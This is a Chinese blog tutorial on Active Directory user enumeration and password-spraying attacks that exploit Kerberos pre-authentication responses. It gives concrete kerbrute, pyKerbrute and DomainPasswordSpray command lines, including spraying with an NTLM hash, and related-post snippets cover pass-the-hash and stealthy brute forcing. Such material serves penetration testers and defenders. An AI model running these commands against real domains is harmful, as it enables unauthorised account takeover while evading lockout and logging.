域渗透-用户枚举和密码喷洒

最新推荐文章于 2023-08-31 14:34:56 发布
最新推荐文章于 2023-08-31 14:34:56 发布
阅读量967 收藏 1
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43227251/article/details/116459005
版权

域渗透-用户枚举和密码喷洒

在 Kerberos 协议认证的 AS-REQ 阶段,cname 的值是用户名。当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对域内进行域用户枚举和密码喷洒攻击

域内用户枚举

当主机不在域内时,我们可以通过域内用户枚举来探测域内的用户。

我们可以使用Kerbrute工具进行探测。

工具地址:https://github.com/ropnop/kerbrute

kerbrute_windows_amd64.exe userenum --dc 10.1.1.1 -d hack.com 1.txt
										域控ip        域名       字典

在这里插入图片描述

也可以通过pyKerbrute工具

工具地址:https://github.com/3gstudent/pyKerbrute

python2 EnumADUser.py 192.168.65.252 hack.com 1.txt udp
或
python2 EnumADUser.py 10.1.1.1 hack.com 1.txt tcp

在这里插入图片描述

密码喷洒攻击

exe
kerbrute_windows_amd64.exe passwordspray --dc 10.1.1.1 -d hack.com 1.txt 123.com

在这里插入图片描述

py脚本
针对明文进行喷洒
python2 ADPwdSpray.py 10.1.1.1 hack.com user.txt clearpassword 123.com tcp

针对哈希进行喷洒
python2 ADPwdSpray.py 10.1.1.1 hack.com user.txt ntlmhash afffeba176210fad4628f0524bfe1942 udp

在这里插入图片描述
在这里插入图片描述

但我更推荐这个

ps脚本
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password 密码

在这里插入图片描述

Invoke-DomainPasswordSpray -UserList user.txt -Domain hack.com -PasswordList pass.txt -OutFile sprayed-creds.txt

自定义账户密码字典

qin9.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pyKerbrute:使用python执行Kerberos预身份验证暴力破解
05-15
pyKerbrute 使用python通过Kerberos预身份验证快速暴力破解并枚举有效的Active Directory帐户 参考: PyKerbrute是我学习Kerberos和Python的练习。 是暴力和枚举有效Active Directory帐户的好工具。由于预身份验证失败不会触发“传统”帐户无法登录事件4625,因此它更快并且可能更隐秘。帐户无法登录事件4625。因此,我尝试使用Python.I实施它。在编写Python代码时请参考 。 Kerbrute通过仅向KDC(控制器)发送一个UDP帧来验证用户名或测试登录。我的PyKerbrute添加了对TCP和Active Directory帐户的NTLM哈希的支持。 EnumADUser.py 使用Kerberos预身份验证枚举有效的Active Directory帐户。 用法: EnumADUser.py <do
红队技巧-渗透的协议利用
qq_50854662的博客
03-27 1597
1.pth(hash传递) 1.1 PTH简介 哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统,攻击者无须通过解密hash值来获取明文密码,因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击,攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。 1.2 PTH限制 在03之后有了ua...
密码喷洒
最新发布
bring_coco的博客
08-31 325
在Kerberos阶段认证的AS-REQ阶段,请求包cname对应的值是用户名,当用户名存在时候,密码正确和错误两种情况下,AS-REP返回包不一样,所以可以利用这一点对用户名进行密码喷洒攻击。
渗透用户账号密码爆破
yy
03-24 3796
在常规的爆破中,我们都是先用很多密码去碰撞一个账号,这样很容易导致账号被锁定。而密码喷洒就是用一个密码去碰撞很多账号,此方法能有效的避免账号被锁定的问题获取了用户后,进行密码喷洒。首先可以查询密码策略(net accounts /domain),根据密码策略再构造爆破字典。
内网渗透下的密码喷洒
LiBai'S BLOG
09-27 5075
1、密码本来源途径(信息泄露、翻配置文件、翻回收站、桌面账号密码本、mimikatz抓到的)2、喷洒的时候工具尽量放到内网机器上面,本地使用工具的线程过高流量过大会导致隧道崩掉3、喷洒时可以针对一个C段进行,这样能爆出来的机器会有很多4、内网渗透中,能获取到主机管理员账号密码,将会使我们横向事半功倍,尤其是在大内网环境中,密码复用率很高,一波喷洒,能助力你拿到一波主机,对拿到的主机再次抓取密码,再用新拿到的密码喷洒一波…,如此反复。
外对内进行信息收集、密码喷洒
yy
06-06 1636
LDAP(Lightweight Directory Access Protocol),轻量⽬录访问协议,是⼀种⽤来查询与更新 Active Directory 的⽬录服务通信协议。AD 服务利⽤ LDAP 命名路径(LDAP naming path)来表示对象在 AD 内的位置,以便⽤它来访问 AD 内的对象,默认端⼝ 389。用户枚举密码喷洒...
用户枚举密码喷洒
qq_18811919的博客
02-26 711
用户枚举密码喷洒讲解了4种工具的使用
用户枚举密码喷洒
G3et的博客
01-08 274
在Kerberos认证的AS-REQ阶段,请求包cname对应的值是用户名。当用户名存在时,在密码正确和错误的情况下,AS-REP的返回包是不一样的,所以可以利用这点对用户进行密码喷洒。在Kerberos认证的AS-REQ阶段,请求包cname对应的值是用户名。AS-REP的包各不相同,可以利用这点进行内用黄金枚举用户可以在没有内有效凭据下,枚举内所存在的用户名,从而可以进行密码喷洒。主要介绍工具:kerbrute,当然还有其它的工具。–dc:控IP或控名称。后面跟上我们的密码即可。
渗透 | Kerberos攻击速查表
12-23 1221
0x01 暴力破解使用kerbrute.py:python kerbrute.py -domain <domain_name> -users <users_file&g...
渗透 | 用户枚举密码喷洒
m0_57221101的博客
04-14 1133
必看!工具缺陷 berbrute工具当使用密码喷洒功能的时候会导致一个问题,密码参数作为独立一个参数会被密码本身存在的特殊字符中断,比如#,$,@一类的东西。 解决方案是先用用户枚举看到用户都有什么之后,用密码爆破把想要喷洒密码放在文本文件中,就可以实现 用户枚举(UserEnum) 原理 在AS_REQ过程中传递的用户信息在AD中存在与否,AS给返回的状态信息不一致,存在的用户还会额外返回e-data数据 三种状态码 KRB5DC_ERR_PREAUTH_REQUIRED需要额外的预
116_Windows 渗透 - 用户密码枚举1
08-03
该命令将会从环境中获取用户名,然后逐个以密码 Winter2016 进行认证枚举该命令将会从 users.txt 中提取用户名,与 passlist.txt
- 枚举系统窗口和取得句柄例程及关闭窗口.rar
04-03
- 枚举系统窗口和取得句柄例程及关闭窗口.rar
易语言枚举资源所有源码-易语言
06-13
易语言枚举资源所有源码
- 枚举系统窗口和取得句柄例程及关闭窗口.e.rar
04-03
- 枚举系统窗口和取得句柄例程及关闭窗口.e.rar
MATLAB源码集锦-基于枚举法离散型优化问题代码
02-14
MATLAB源码集锦-基于枚举法离散型优化问题代码
用户枚举密码喷洒攻击(Password Spraying)
谢公子的博客
04-28 4086
目录 用户枚举 密码喷洒攻击 在 Kerberos 协议认证的 AS-REQ阶段,cname 的值是用户名。当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对内进行用户枚举密码喷洒攻击 用户枚举 当主机不在内时,我们可以通过用户枚举来探测内的用户。我们可以使用nmap指定脚本来探测。 nmap ...
渗透密码喷洒攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-13 1475
在实际渗透中,许多渗透测试人员和攻击者通常都会使用一种被称为 “密码喷洒”(Password Spraying)的技术来进行测试和攻击。对密码进行喷洒式的攻击,这个叫法很形象,因为它属于自动化密码猜测的一种。这种针对所有用户的自动密码猜测通常是为了避免帐户被锁定,因为针对同一个用户的连续密码猜测会导致帐户被锁定。所以只有对所有用户同时执行特定的密码登录尝试,才能增加破解的概率,消除帐户被锁定的概率。普通的爆破就是用户名固定,爆破密码,但是密码喷洒,是用固定的密码去跑用户名。
密码喷洒实现
热门推荐
Shanfenglan's blog
10-27 9万+
密码喷洒 利用一个powershell工具完成DomainPasswordSpray 利用工具:DomainPasswordSpray 命令 下载工具 curl https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1 > C:\Users\Administrator\Desktop\1.ps1 powershell (new-object System.Net.W
[内网渗透]—外向内信息收集、密码喷洒
Sentiment的博客
12-16 1157
当我们与目标内网建立了socks5隧道后,就可以从外对内机器进行信息搜集了,很多工具不用上传到目标机器,也就不易被AV检测到,但是有可能会被一些流量检测设备发现有大量socks5流量。接下来介绍下如何通过外对内进⾏更深的信息搜集:枚举⽤户、查看内⽤户、查看内组、查看内机器列表…LDAP(轻量⽬录访问协议),是⼀种⽤来查询与更新 Active Directory 的⽬录服务通信协议。AD 服务利⽤ LDAP 命名路径(LDAP naming path)来表示对象在 AD 内的位置,以便⽤它来
mybatis-plus枚举字段映射
05-13
在 MyBatis-Plus 中,我们可以使用 `@EnumValue` 和 `@EnumValue` 注解来进行枚举字段映射。具体使用方法如下: ```java public class User { private Long id; private String name; @EnumValue private ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值